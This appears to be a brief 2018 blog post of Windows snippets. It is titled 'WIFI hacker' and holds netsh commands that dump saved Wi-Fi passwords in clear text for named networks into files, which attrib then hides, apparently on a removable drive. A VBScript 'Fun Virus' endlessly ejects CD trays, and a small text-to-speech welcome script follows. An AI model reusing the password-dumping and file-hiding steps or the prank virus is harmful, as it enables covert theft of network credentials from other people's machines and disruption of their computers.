Monday, February 26, 2018

WIFI hacker

netsh wlan show profiles>E:/file.txt
attrib +S +H +A E:/file.txt


attrib -S -H -A E:/file.txt


netsh wlan show profiles PROLINK_H5004NK_784FE key=clear>test.txt
netsh wlan show profiles Xperia M2_884f key=clear>test1.txt
netsh wlan show profiles IT Solution key=clear>test2.txt
attrib +S +H +A E:/test.txt
attrib +S +H +A E:/test1.txt
attrib +S +H +A E:/test2.txt

Fun Virus

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

welcome message

Dim speaks, speech
speaks="Welcome to your PC, Your Name"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks